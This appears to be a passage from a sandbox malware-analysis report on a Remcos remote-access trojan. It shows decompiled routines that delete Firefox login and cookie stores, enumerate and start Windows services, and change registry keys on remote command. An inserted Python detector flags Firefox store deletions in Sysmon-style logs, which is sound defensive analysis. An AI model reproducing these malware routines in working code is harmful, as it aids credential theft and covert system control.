                                    					L0040A6EF(0, _t104, _t117);
                                    					L18:
                                    				}
                                    				L19:
                                    				L00401FC7();
                                    				L00401FC7();
                                    				return 1;
			}

                                    Instruction addresses: 0x0040a22d to 0x0040a3ff (per-line address column of the listing above)

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A2A5
                                    • FindClose.KERNEL32(00000000), ref: 0040A2BB
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040A2E5
                                    • DeleteFileA.KERNEL32(00000000,00000000), ref: 0040A38D
                                    • GetLastError.KERNEL32 ref: 0040A397
                                    • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040A3AB
                                    • FindClose.KERNEL32(00000000), ref: 0040A3D1
                                    • FindClose.KERNEL32(00000000), ref: 0040A3F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$Close$Next$DeleteErrorFirstLast
                                    • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                    • API String ID: 532992503-432212279
                                    • Opcode ID: 2c1ab3ee3b965990f416345f1d4c85d5ca13f1cb4dc72bdcb68ad7aa493db07d
                                    • Instruction ID: 2e8bce256a7dd72f22d157e061cccd6386a79eba79b63e076e2be11f32c05444
                                    • Opcode Fuzzy Hash: 2c1ab3ee3b965990f416345f1d4c85d5ca13f1cb4dc72bdcb68ad7aa493db07d
                                    • Instruction Fuzzy Hash: 5441B2309003195BCB14FBA5DC569EE7778AF11305F40017FF806B61D2EF385A99CA9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

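The two Firefox routines above (the logins.json/key3.db one at 0x0040a012 and the cookies.sqlite one, E0040A22D) share one loop: build `%UserProfile%\AppData\Roaming\Mozilla\Firefox\Profiles\`, enumerate it with FindFirstFileA/FindNextFileA, skip `.` and `..`, and call DeleteFileA on the named store inside each profile directory. What a defender wants from this is the detection, not a reimplementation. The Python below is an added example, not code from the report or from Remcos: it parses constructed Sysmon-style FileDelete records (EventID 23/26 in a hypothetical key="value" text format; the process path `sample.exe`, the user and the profile name are made up) and flags deletions of Firefox credential and cookie stores under a Profiles directory by anything other than firefox.exe. It goes beyond the sample by also flagging key4.db, the NSS key store that replaced key3.db in Firefox 58 and later; the decompiled code only names key3.db, so on a current profile this routine deletes logins.json but leaves the key file that decrypts it.

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import List, Optional, Tuple

# Files the decompiled routines delete inside each profile directory
# (logins.json, key3.db, cookies.sqlite) plus key4.db, the key store that
# replaced key3.db in Firefox 58+ and which this sample never names.
FIREFOX_STORE_FILES = {"logins.json", "key3.db", "key4.db", "cookies.sqlite"}
# Directory chain the sample appends to %UserProfile%, lower-cased.
PROFILES_CHAIN = ("appdata", "roaming", "mozilla", "firefox", "profiles")
# Processes that legitimately rewrite these files.
ALLOWED_IMAGES = {"firefox.exe"}
# Sysmon FileDelete (23) and FileDeleteDetected (26).
DELETE_EVENT_IDS = {23, 26}


@dataclass(frozen=True)
class FileDeleteEvent:
    event_id: int
    image: str      # process that performed the delete
    target: str     # TargetFilename


# Hypothetical record format: space-separated Key="Value" pairs.
_KV_RE = re.compile(r'(\w+)="([^"]*)"')


def parse_event(line: str) -> Optional[FileDeleteEvent]:
    """Parse one record; return None when the expected fields are missing."""
    fields = dict(_KV_RE.findall(line))
    try:
        return FileDeleteEvent(int(fields["EventID"]), fields["Image"],
                               fields["TargetFilename"])
    except (KeyError, ValueError):
        return None


def is_firefox_store_path(path: str) -> bool:
    r"""True for <...>\AppData\Roaming\Mozilla\Firefox\Profiles\<profile>\<store>."""
    p = PureWindowsPath(path)
    parts = [s.lower() for s in p.parts]
    n = len(PROFILES_CHAIN)
    if p.name.lower() not in FIREFOX_STORE_FILES or len(parts) < n + 2:
        return False
    # The store must sit directly in a profile directory, which in turn
    # sits directly under the Profiles chain the sample walks with "*".
    return tuple(parts[-(n + 2):-2]) == PROFILES_CHAIN


def find_store_deletions(lines) -> List[Tuple[str, str]]:
    """Return (image, store file name) for each suspicious deletion."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None or ev.event_id not in DELETE_EVENT_IDS:
            continue
        if not is_firefox_store_path(ev.target):
            continue
        if PureWindowsPath(ev.image).name.lower() in ALLOWED_IMAGES:
            continue  # Firefox rewriting its own stores is normal
        hits.append((ev.image, PureWindowsPath(ev.target).name))
    return hits


# Constructed records with a hypothetical dropper path and profile name.
_ATTACKER = r"C:\Users\alice\AppData\Local\Temp\sample.exe"
_PROFILE = r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\x7k2q9ab.default-release"
SAMPLE_LOG = [
    f'EventID="26" Image="{_ATTACKER}" TargetFilename="{_PROFILE}\\logins.json"',
    f'EventID="26" Image="{_ATTACKER}" TargetFilename="{_PROFILE}\\key3.db"',
    f'EventID="23" Image="{_ATTACKER}" TargetFilename="{_PROFILE}\\cookies.sqlite"',
    f'EventID="26" Image="{_ATTACKER}" TargetFilename="{_PROFILE}\\key4.db"',
    f'EventID="26" Image="C:\\Program Files\\Mozilla Firefox\\firefox.exe" '
    f'TargetFilename="{_PROFILE}\\cookies.sqlite"',
    f'EventID="26" Image="{_ATTACKER}" TargetFilename="{_PROFILE}\\prefs.js"',
    f'EventID="11" Image="{_ATTACKER}" TargetFilename="{_PROFILE}\\logins.json"',
    f'EventID="26" Image="{_ATTACKER}" TargetFilename="C:\\Users\\alice\\Desktop\\logins.json"',
    'malformed record without the expected fields',
]

if __name__ == "__main__":
    for image, store in find_store_deletions(SAMPLE_LOG):
        print(f"Firefox store deleted by {image}: {store}")
```

Only deletions directly inside a profile directory count, which mirrors the sample's `Profiles\*\<file>` path construction; a copy of logins.json on the desktop or a FileCreate event for the same name does not fire. Real Sysmon output is XML or EVTX rather than this key="value" form, so only `parse_event` needs replacing to run the same check on a live collector.
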
                                    C-Code - Quality: 94%
                                    			E004160DB(intOrPtr __ecx) {
                                    				int _v8;
                                    				int _v12;
                                    				int _v16;
                                    				int _v20;
                                    				struct _QUERY_SERVICE_CONFIG* _v24;
                                    				void* _v28;
                                    				intOrPtr _v32;
                                    				short** _v36;
                                    				intOrPtr _v40;
                                    				char _v64;
                                    				char _v88;
                                    				char _v112;
                                    				char _v136;
                                    				struct _ENUM_SERVICE_STATUS _v172;
                                    				void* __ebx;
                                    				void* __edi;
                                    				struct _ENUM_SERVICE_STATUS* _t87;
                                    				void* _t100;
                                    				void* _t107;
                                    				int _t108;
                                    				long _t110;
                                    				void* _t133;
                                    				intOrPtr _t198;
                                    				short** _t199;
                                    				int _t201;
                                    				intOrPtr _t202;
                                    				int _t203;
                                    
                                    				_t198 = __ecx;
                                    				_v40 = __ecx;
                                    				_t133 = OpenSCManagerA(0, 0, 4);
                                    				if(_t133 != 0) {
                                    					L00401F6D(_t133,  &_v88);
                                    					_v12 = 0;
                                    					_v8 = 0;
                                    					_v20 = 0;
                                    					__eflags = EnumServicesStatusW(_t133, 0x3b, 3,  &_v172, 0,  &_v12,  &_v8,  &_v20);
                                    					if(__eflags != 0) {
                                    						L12:
                                    						CloseServiceHandle(_t133);
                                    						E0040331A(_t133, _t198, __eflags,  &_v88);
                                    						L00401EF0();
                                    						L13:
                                    						return _t198;
                                    					}
                                    					__eflags = GetLastError() - 0xea;
                                    					if(__eflags != 0) {
                                    						goto L12;
                                    					}
                                    					_t201 = _v12;
                                    					_push(_t201);
                                    					_t87 = E004394F6( &_v88);
                                    					_v36 = _t87;
                                    					EnumServicesStatusW(_t133, 0x3b, 3, _t87, _t201,  &_v12,  &_v8,  &_v20);
                                    					_t202 = 0;
                                    					_v32 = 0;
                                    					__eflags = _v8;
                                    					if(__eflags <= 0) {
                                    						L11:
                                    						L004394F1(_v36);
                                    						goto L12;
                                    					}
                                    					_t199 = _v36;
                                    					do {
                                    						E00403311(E00404405(_t133,  &_v112, _t199[1], __eflags, E0040427F(_t133,  &_v64, 0x4659c4)));
                                    						L00401EF0();
                                    						L00401EF0();
                                    						E00403311(E00404405(_t133,  &_v64,  *_t199, __eflags, E0040427F(_t133,  &_v112, 0x4659c4)));
                                    						L00401EF0();
                                    						L00401EF0();
                                    						_t100 = E0040427F(_t133,  &_v136, 0x4659c4);
                                    						E00403311(E00403030( &_v64, E0041729F(_t133,  &_v112, _t199[3]), _t100));
                                    						L00401EF0();
                                    						L00401EF0();
                                    						L00401EF0();
                                    						_v16 = _v16 & 0x00000000;
                                    						_t107 = OpenServiceW(_t133,  *_t199, 1);
                                    						_v28 = _t107;
                                    						_t108 = QueryServiceConfigW(_t107, _v24, 0,  &_v16);
                                    						__eflags = _t108;
                                    						if(_t108 == 0) {
                                    							_t110 = GetLastError();
                                    							__eflags = _t110 - 0x7a;
                                    							if(_t110 == 0x7a) {
                                    								_t203 = _v16;
                                    								_push(_t203);
                                    								_v24 = E004394F6( &_v16);
                                    								_t204 = _v24;
                                    								QueryServiceConfigW(_v28, _v24, _t203,  &_v16);
                                    								E00403311(E004030A6(_t133,  &_v136, E0041729F(_t133,  &_v64,  *_v24), _t199, __eflags, 0x4659c4));
                                    								L00401EF0();
                                    								L00401EF0();
                                    								E00403311(E004030A6(_t133,  &_v136, E0041729F(_t133,  &_v64,  *((intOrPtr*)(_t204 + 4))), _t199, __eflags, 0x4659c4));
                                    								L00401EF0();
                                    								L00401EF0();
                                    								E00403311(E004030A6(_t133,  &_v136, E00404405(_t133,  &_v64,  *((intOrPtr*)(_t204 + 0xc)), __eflags, E0040427F(_t133,  &_v112, 0x4659c4)), _t199, __eflags, "\n"));
                                    								L00401EF0();
                                    								L00401EF0();
                                    								L00401EF0();
                                    								L004394F1(_t204);
                                    								_t202 = _v32;
                                    							}
                                    						}
                                    						CloseServiceHandle(_v28);
                                    						_t202 = _t202 + 1;
                                    						_t199 =  &(_t199[9]);
                                    						_v32 = _t202;
                                    						__eflags = _t202 - _v8;
                                    					} while (__eflags < 0);
                                    					_t198 = _v40;
                                    					goto L11;
                                    				}
                                    				E0040427F(_t133, _t198, 0x45f724);
                                    				goto L13;
                                    			}

                                    Instruction addresses (listing order):
                                    0x004160eb 0x004160ef 0x004160f8 0x004160fc 0x00416112 0x0041611a 0x00416121 0x00416128 0x0041613f 0x00416141
                                    0x0041638a 0x0041638b 0x00416397 0x0041639f 0x004163a4 0x004163ac 0x004163ac 0x0041614d 0x00416152 0x00000000
                                    0x00000000 0x00416158 0x0041615b 0x0041615c 0x00416165 0x00416178 0x0041617e 0x00416180 0x00416183 0x00416186
                                    0x00416381 0x00416384 0x00000000 0x00416389 0x0041618c 0x0041618f 0x004161ad 0x004161b5 0x004161bd 0x004161df
                                    0x004161e7 0x004161ef 0x004161ff 0x0041621f 0x00416227 0x0041622f 0x0041623a 0x0041623f 0x00416248 0x00416251
                                    0x0041625b 0x00416261 0x00416263 0x00416269 0x0041626f 0x00416272 0x00416278 0x0041627b 0x00416282 0x0041628a
                                    0x00416291 0x004162b8 0x004162c3 0x004162cb 0x004162f2 0x004162fd 0x00416305 0x0041633b 0x00416346 0x0041634e
                                    0x00416356 0x0041635c 0x00416361 0x00416364 0x00416272 0x00416368 0x0041636e 0x0041636f 0x00416372 0x00416375
                                    0x00416375 0x0041637e 0x00000000 0x0041637e 0x00416105 0x00000000

                                    APIs
                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,?,0046BACC,0046C998), ref: 004160F2
                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,00415BDC,?), ref: 00416139
                                    • GetLastError.KERNEL32(?,0046BACC,0046C998), ref: 00416147
                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,00415BDC,?), ref: 00416178
                                    • OpenServiceW.ADVAPI32(00000000,?,00000001,00000000,004659C4,00000000,004659C4,00000000,004659C4,?,0046BACC,0046C998), ref: 00416248
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: EnumOpenServicesStatus$ErrorLastManagerService
                                    • String ID:
                                    • API String ID: 2247270020-0
                                    • Opcode ID: 2a95b1dc2d7ea87457b6892e2edf2988bf99cf90c0ea0d464b8aeb3cdcf6ae09
                                    • Instruction ID: 68473e94775990671fd8c6040cdbc231cd1f0957a3a8cd51887978b0f5e9c903
                                    • Opcode Fuzzy Hash: 2a95b1dc2d7ea87457b6892e2edf2988bf99cf90c0ea0d464b8aeb3cdcf6ae09
                                    • Instruction Fuzzy Hash: 7B814D71D00209AACB14EBA1DC929EEB739EF14345F10406EF916761D2EF386A09CB98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004163AD(char _a4) {
                                    				void* _t5;
                                    				signed int _t14;
                                    				void* _t17;
                                    				void* _t18;
                                    
                                    				_t14 = 0;
                                    				_t5 = OpenSCManagerW(0, 0, 0x10);
                                    				_t1 =  &_a4; // 0x416033
                                    				_t18 = _t5;
                                    				_t17 = OpenServiceW(_t18, L00401EEB(_t1), 0x10);
                                    				if(_t17 != 0) {
                                    					_t14 = 0 | StartServiceW(_t17, 0, 0) != 0x00000000;
                                    					CloseServiceHandle(_t18);
                                    					CloseServiceHandle(_t17);
                                    				} else {
                                    					CloseServiceHandle(_t18);
                                    				}
                                    				L00401EF0();
                                    				return _t14;
                                    			}

                                    Instruction addresses (listing order):
                                    0x004163b5 0x004163b9 0x004163c1 0x004163c4 0x004163d3 0x004163d7 0x004163f4 0x004163f7 0x004163fa 0x004163d9
                                    0x004163da 0x004163da 0x004163ff 0x0041640a

                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,?,00416033,00000000), ref: 004163B9
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,00416033,00000000), ref: 004163CD
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163DA
                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,00416033,00000000), ref: 004163E5
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163F7
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,00416033,00000000), ref: 004163FA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ManagerStart
                                    • String ID: 3`A
                                    • API String ID: 276877138-3175782522
                                    • Opcode ID: b01b844c620f2adba2967bf90f13e31907c9191db02da24ff555517433b69a50
                                    • Instruction ID: 62d5a2aa0acc4a9a23ffe864dccd2203370fbef9b686cd9ab08c2db04e146924
                                    • Opcode Fuzzy Hash: b01b844c620f2adba2967bf90f13e31907c9191db02da24ff555517433b69a50
                                    • Instruction Fuzzy Hash: 18F090311413187FD2116F659C88DBF3B6CDA41BE6B00002AF80592192CE68CE85A5B9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 78%
                                    			E00411205(void* __edx, void* __eflags, char _a8) {
                                    				char _v36;
                                    				char _v48;
                                    				char _v52;
                                    				char _v68;
                                    				char _v76;
                                    				char _v80;
                                    				char _v84;
                                    				char _v88;
                                    				char _v92;
                                    				char _v96;
                                    				char _v100;
                                    				struct _SECURITY_ATTRIBUTES _v104;
                                    				char _v108;
                                    				void* _v112;
                                    				char _v120;
                                    				intOrPtr _v124;
                                    				char _v128;
                                    				void* __ebx;
                                    				void* __esi;
                                    				void* __ebp;
                                    				intOrPtr* _t77;
                                    				void* _t88;
                                    				void* _t99;
                                    				void* _t101;
                                    				void* _t102;
                                    				void* _t104;
                                    				signed int _t105;
                                    				void* _t113;
                                    				void* _t120;
                                    				void* _t121;
                                    				void* _t123;
                                    				void* _t127;
                                    				signed short* _t135;
                                    				void* _t137;
                                    				void* _t141;
                                    				void* _t146;
                                    				void* _t150;
                                    				void* _t152;
                                    				void* _t153;
                                    				void* _t155;
                                    				signed int _t156;
                                    				intOrPtr* _t158;
                                    				void* _t160;
                                    				void* _t162;
                                    				void* _t163;
                                    				void* _t165;
                                    				void* _t171;
                                    				void* _t173;
                                    				void* _t174;
                                    				void* _t176;
                                    				void* _t181;
                                    				void* _t182;
                                    				long _t185;
                                    				signed short* _t195;
                                    				void* _t205;
                                    				void* _t217;
                                    				void* _t233;
                                    				void* _t247;
                                    				signed int _t258;
                                    				signed int _t313;
                                    				signed int _t323;
                                    				signed int _t326;
                                    				void* _t328;
                                    				void* _t330;
                                    				void* _t335;
                                    				void* _t337;
                                    				void* _t339;
                                    				signed int _t340;
                                    				void* _t341;
                                    				signed int _t347;
                                    				signed int _t348;
                                    				void* _t351;
                                    				void* _t352;
                                    				void* _t353;
                                    				void* _t356;
                                    				void* _t361;
                                    				void* _t362;
                                    				void* _t364;
                                    				void* _t365;
                                    				void* _t367;
                                    				void* _t368;
                                    				void* _t369;
                                    				void* _t370;
                                    				void* _t372;
                                    				void* _t374;
                                    				void* _t379;
                                    
                                    				_t379 = __eflags;
                                    				_t320 = __edx;
                                    				_push(_t203);
                                    				_t77 = L00401F95( &_a8);
                                    				_push(0xffffffff);
                                    				_t328 = 4;
                                    				_push(_t328);
                                    				_push( &_v52);
                                    				E004042A6( &_a8);
                                    				_t351 = (_t348 & 0xfffffff8) - 0x44;
                                    				E004020EC(_t203, _t351, __edx, _t379, 0x46c238);
                                    				_t352 = _t351 - 0x18;
                                    				E004020EC(_t203, _t352, __edx, _t379,  &_v68);
                                    				E00417478( &_v108, __edx);
                                    				_t353 = _t352 + 0x30;
                                    				_t335 =  *_t77 - 0x35;
                                    				if(_t335 == 0) {
                                    					L00401F6D(_t203,  &_v76);
                                    					__eflags = E004021F5( &_v88) - 1;
                                    					if(__eflags > 0) {
                                    						L00409DC9(_t203,  &_v80, L00401F95(L00401E49( &_v88, _t320, __eflags, 1)));
                                    					}
                                    					E004020EC(_t203, _t353 - 0x18, _t320, __eflags, L00401E49( &_v88, _t320, __eflags, 0));
                                    					_t88 = L00401EEB( &_v84);
                                    					_t320 = 1;
                                    					_t217 = _t88;
                                    					L37:
                                    					E00411046(_t217, _t320, _t386);
                                    					L38:
                                    					L00401EF0();
                                    					L39:
                                    					L00401E74( &_v88, _t320);
                                    					L00401FC7();
                                    					L00401FC7();
                                    					return 0;
                                    				}
                                    				_t337 = _t335 - 1;
                                    				if(_t337 == 0) {
                                    					_t99 = L00401F95(L00401E49( &_v88, __edx, __eflags, 2));
                                    					_t101 = L00401F95(L00401E49( &_v92, __edx, __eflags, 1));
                                    					_t330 = 0;
                                    					_t102 = L00401E49( &_v96, __edx, __eflags, 0);
                                    					_t356 = _t353 - 0x18;
                                    					E004020EC(_t203, _t356, _t320, __eflags, _t102);
                                    					_t104 = L00410FB5(_t203, __eflags, _t99);
                                    					_t320 = _t101;
                                    					_t105 = L00410D5C(_t104, _t101);
                                    					_t358 = _t356 + 0x18 - 0x18;
                                    					_t233 = _t356 + 0x18 - 0x18;
                                    					__eflags = _t105;
                                    					if(__eflags == 0) {
                                    						_push("2");
                                    						L33:
                                    						E00402084(_t203, _t233);
                                    						L00404AA4(_t203, 0x46c700, _t320, __eflags);
                                    						goto L39;
                                    					}
                                    					_push("1");
                                    					L20:
                                    					E00402084(_t203, _t233);
                                    					L00404AA4(_t203, 0x46c700, _t320, __eflags);
                                    					E004020EC(_t203, _t358 - 0x18, _t320, __eflags, L00401E49( &_v120, _t320, __eflags, _t330));
                                    					_t113 = L00401F95(L00401E49( &_v128, _t320, __eflags, 1));
                                    					_t320 = 0;
                                    					E00411046(_t113, 0, __eflags);
                                    					goto L39;
                                    				}
                                    				_t339 = _t337 - 1;
                                    				if(_t339 == 0) {
                                    					E0040427F(_t203,  &_v80, L00401F95(L00401E49( &_v88, __edx, __eflags, 1)));
                                    					 *0x46bd64 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), "SHDeleteKeyW");
                                    					_t120 = L00401EEB( &_v84);
                                    					_t121 = L00401E49( &_v96, _t320, __eflags, 0);
                                    					_t361 = _t353 - 0x18;
                                    					E004020EC(_t203, _t361, _t320, __eflags, _t121);
                                    					_t123 = L00410FB5(_t203, __eflags, _t120);
                                    					_t362 = _t361 + 0x18;
                                    					__eflags =  *0x46bd64(_t123);
                                    					if(__eflags != 0) {
                                    						_t247 = _t362 - 0x18;
                                    						_push("9");
                                    						L12:
                                    						E00402084(_t203, _t247);
                                    						L00404AA4(_t203, 0x46c700, _t320, __eflags);
                                    						goto L38;
                                    					}
                                    					_t127 = E00402489();
                                    					_t340 = 2;
                                    					_t203 = L0041184C( &_v84, "\\", _t127 - _t340);
                                    					__eflags = _t203 - 0xffffffff;
                                    					if(__eflags != 0) {
                                    						_t50 = _t203 + 1; // 0x1
                                    						_push( ~(__eflags > 0) | _t50 * _t340);
                                    						_v100 = E0042F4C6( ~(__eflags > 0) | _t50 * _t340, _t50 * _t340 >> 0x20, _t340, __eflags);
                                    						_t135 = L00401EEB(E00407309( &_v84,  &_v36, 0, _t203));
                                    						_t203 = _v112;
                                    						_t323 = _v112 - _t135;
                                    						__eflags = _t323;
                                    						do {
                                    							_t258 =  *_t135 & 0x0000ffff;
                                    							 *(_t323 + _t135) = _t258;
                                    							_t135 = _t135 + _t340;
                                    							__eflags = _t258;
                                    						} while (__eflags != 0);
                                    						L00401EF0();
                                    						_t137 = L00401E49( &_v96, _t323, __eflags, 0);
                                    						_t364 = _t362 - 0x18;
                                    						E004020EC(_t203, _t364, _t323, __eflags, _t137);
                                    						_t320 = 0;
                                    						__eflags = 0;
                                    						E00411046(_t203, 0, 0);
                                    						E0042F4CF(_t203);
                                    						_t365 = _t364 + 0x1c;
                                    						L28:
                                    						_t247 = _t365 - 0x18;
                                    						_push("8");
                                    						goto L12;
                                    					}
                                    					_t141 = L00401E49( &_v96, _t320, __eflags, 0);
                                    					_t367 = _t362 - 0x18;
                                    					E004020EC(_t203, _t367, _t320, __eflags, _t141);
                                    					_t320 = 0;
                                    					E00411046(0, 0, __eflags);
                                    					_t365 = _t367 + 0x18;
                                    					goto L28;
                                    				}
                                    				_t341 = _t339 - 1;
                                    				if(_t341 == 0) {
                                    					_t146 = L00436769(_t144, L00401F95(L00401E49( &_v88, __edx, __eflags, 3)));
                                    					__eflags = _t146 - _t328;
                                    					if(__eflags == 0) {
                                    						_push( *((intOrPtr*)(L00401F95(L00401E49( &_v92, __edx, __eflags, _t328)))));
                                    						_t150 = L00401F95(L00401E49( &_v92, __edx, __eflags, 2));
                                    						_t152 = L00401F95(L00401E49( &_v96, _t320, __eflags, 1));
                                    						_t330 = 0;
                                    						__eflags = 0;
                                    						_t153 = L00401E49( &_v100, _t320, 0, 0);
                                    						_t368 = _t353 - 0x18;
                                    						E004020EC(_t203, _t368, _t320, __eflags, _t153);
                                    						_t155 = L00410FB5(_t203, __eflags, _t150);
                                    						_t369 = _t368 + 0x18;
                                    						_t320 = _t152;
                                    						_t156 = L00410BF8(_t155, _t152);
                                    					} else {
                                    						__eflags = _t146 - 0xb;
                                    						if(__eflags == 0) {
                                    							_t158 = L00401F95(L00401E49( &_v92, __edx, __eflags, _t328));
                                    							_t160 = L00401F95(L00401E49( &_v92, __edx, __eflags, 2));
                                    							_t162 = L00401F95(L00401E49( &_v96, _t320, __eflags, 1));
                                    							_t330 = 0;
                                    							_t163 = L00401E49( &_v100, _t320, __eflags, 0);
                                    							_t370 = _t353 - 0x18;
                                    							E004020EC(_t203, _t370, _t320, __eflags, _t163);
                                    							_t165 = L00410FB5(_t203, __eflags, _t160);
                                    							_t320 = _t162;
                                    							_t156 = L00410C3C(_t165, _t162,  *_t158,  *((intOrPtr*)(_t158 + 4)));
                                    							_t369 = _t370 + 0x24;
                                    						} else {
                                    							_push(_t146);
                                    							L00401E49( &_v92, __edx, __eflags, _t328);
                                    							_push(E00402489());
                                    							_push(L00401F95(L00401E49( &_v92, __edx, __eflags, _t328)));
                                    							_t171 = L00401F95(L00401E49( &_v96, _t320, __eflags, 2));
                                    							_t173 = L00401F95(L00401E49( &_v100, _t320, __eflags, 1));
                                    							_t330 = 0;
                                    							_t174 = L00401E49( &_v104, _t320, __eflags, 0);
                                    							_t372 = _t353 - 0x18;
                                    							E004020EC(_t203, _t372, _t320, __eflags, _t174);
                                    							_t176 = L00410FB5(_t203, __eflags, _t171);
                                    							_t320 = _t173;
                                    							_t156 = L00410B08(_t176, _t173);
                                    							_t369 = _t372 + 0x28;
                                    						}
                                    					}
                                    					_t358 = _t369 - 0x18;
                                    					_t233 = _t369 - 0x18;
                                    					__eflags = _t156;
                                    					if(__eflags == 0) {
                                    						_push("5");
                                    						goto L33;
                                    					} else {
                                    						_push("4");
                                    						goto L20;
                                    					}
                                    				}
                                    				_t384 = _t341 != 1;
                                    				if(_t341 != 1) {
                                    					goto L39;
                                    				}
                                    				E0040427F(_t203,  &_v80, L00401F95(L00401E49( &_v88, __edx, _t384, 1)));
                                    				_t181 = L00401EEB( &_v84);
                                    				_t182 = L00401E49( &_v96, __edx, _t384, 0);
                                    				_t374 = _t353 - 0x18;
                                    				E004020EC(_t203, _t374, __edx, _t384, _t182);
                                    				_t185 = RegCreateKeyExW(L00410FB5(_t203, _t384, _t181), 0, 0, 0, 0x20006, 0,  &_v104, 0, ??);
                                    				RegCloseKey(_v112);
                                    				_t376 = _t374 + 0x18 - 0x18;
                                    				_t247 = _t374 + 0x18 - 0x18;
                                    				_t385 = _t185;
                                    				if(_t185 != 0) {
                                    					_push("7");
                                    					goto L12;
                                    				}
                                    				E00402084(_t203, _t247, "6");
                                    				_push(0x72);
                                    				L00404AA4(_t203, 0x46c700, _t320, _t385);
                                    				_t205 = E00407323( &_v108, 0x46c700, 0x46c700);
                                    				_t386 = _t205 - 0xffffffff;
                                    				if(_t205 != 0xffffffff) {
                                    					_t14 = _t205 + 1; // 0x1
                                    					_t347 = 2;
                                    					_push( ~(__eflags > 0) | _t14 * _t347);
                                    					_v112 = E0042F4C6( ~(__eflags > 0) | _t14 * _t347, _t14 * _t347 >> 0x20, _t347, __eflags);
                                    					_t195 = L00401EEB(E00407309( &_v96,  &_v48, 0, _t205));
                                    					_t206 = _v124;
                                    					_t326 = _v124 - _t195;
                                    					__eflags = _t326;
                                    					do {
                                    						_t313 =  *_t195 & 0x0000ffff;
                                    						 *(_t326 + _t195) = _t313;
                                    						_t195 = _t195 + _t347;
                                    						__eflags = _t313;
                                    					} while (__eflags != 0);
                                    					L00401EF0();
                                    					E004020EC(_t206, _t376 - 0x18, _t326, __eflags, L00401E49( &_v108, _t326, __eflags, 0));
                                    					_t320 = 0;
                                    					E00411046(_t206, 0, __eflags);
                                    					E0042F4CF(_t206);
                                    					goto L38;
                                    				}
                                    				E004020EC(_t205, _t376 - 0x18, _t320, _t386, L00401E49( &_v108, _t320, _t386, 0));
                                    				_t320 = 0;
                                    				_t217 = 0;
                                    				goto L37;
                                    			}
                                    (Instruction address column for the function above, covering 0x00411205 to 0x004117F0; the per-line addresses that the report renders beside each decompiled line are omitted here.)

                                    APIs
                                    • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004112DA
                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004112E6
                                      • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                    • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004115C7
                                    • GetProcAddress.KERNEL32(00000000), ref: 004115CE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCloseCreateLibraryLoadProcsend
                                    • String ID: SHDeleteKeyW$Shlwapi.dll
                                    • API String ID: 2127411465-314212984
                                    • Opcode ID: 85830c285fda22642963a2c44f2ad4dcb9a4aac340446b9a8848ea33e97687ea
                                    • Instruction ID: 42533e532c22dbc36938cc4a5415c4332dc933708f84597f9d810698dd7565cc
                                    • Opcode Fuzzy Hash: 85830c285fda22642963a2c44f2ad4dcb9a4aac340446b9a8848ea33e97687ea
                                    • Instruction Fuzzy Hash: B4E1D171A043005BCA14B7B6CC5B9BF76A95B95708F40052FFA42B71F3EE7C8948869A
                                    Uniqueness

                                    Uniqueness Score: -1.00%
